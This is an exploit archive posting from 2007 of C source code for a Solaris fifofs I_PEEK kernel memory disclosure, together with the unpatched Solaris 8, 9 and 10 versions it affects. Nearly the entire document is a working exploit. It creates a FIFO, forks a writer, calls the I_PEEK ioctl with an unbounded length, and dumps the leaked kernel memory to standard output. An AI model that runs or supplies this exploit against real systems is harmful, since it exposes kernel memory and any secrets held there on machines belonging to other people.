Home / exploits solaris-fifofs.txt
Posted on 11 October 2007
/* 10/2007: public release * SPARC * Solaris 8 without 109454-06 * Solaris 9 without 117471-04 * Solaris 10 without 127737-01 * x86 * Solaris 8 without 109455-06 * Solaris 9 without 117472-04 * Solaris 10 without 127738-01 * * Solaris fifofs I_PEEK Kernel Memory Disclosure * By qaaz */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stropts.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #define PAGE_COUNT 1000 int main(int argc, char *argv[]) { struct strpeek strpeek; char *buf, *end; int pg = PAGE_COUNT, fd, pagesz, bufsz; fprintf(stderr, "--------------------------------------- " " Solaris fifofs I_PEEK Kmem Disclosure " " By qaaz " "--------------------------------------- "); if (argc > 1) pg = atoi(argv[1]); pagesz = getpagesize(); if (mknod("fifo", S_IFIFO | 0666, 0) < 0) { perror("mknod"); return -1; } switch (fork()) { case -1: perror("fork"); goto cleanup; case 0: if ((fd = open("fifo", O_WRONLY)) < 0) { perror("open"); exit(0); } write(fd, "abcd", 4); exit(0); break; default: if ((fd = open("fifo", O_RDONLY)) < 0) { perror("open"); goto cleanup; } break; } bufsz = (pg + 1) * pagesz; if (!(buf = memalign(pagesz, bufsz))) { perror("malloc"); goto cleanup; } memset(buf, 0, bufsz); end = buf + (pg * pagesz); fprintf(stderr, "-> [ %p .. %p ] ", buf, end); fflush(stderr); if (mprotect(end, pagesz, PROT_NONE) < 0) { perror("mprotect"); goto cleanup; } memset(&strpeek, 0, sizeof(strpeek)); strpeek.databuf.buf = buf; strpeek.databuf.maxlen = -1; if (ioctl(fd, I_PEEK, &strpeek) < 0) { perror("ioctl"); goto cleanup; } while (end > buf && end[-1] == 0) end--; fprintf(stderr, "== %d ", (int) (end - buf)); fflush(stderr); if (!isatty(1)) write(1, buf, (size_t) (end - buf)); cleanup: unlink("fifo"); return 0; }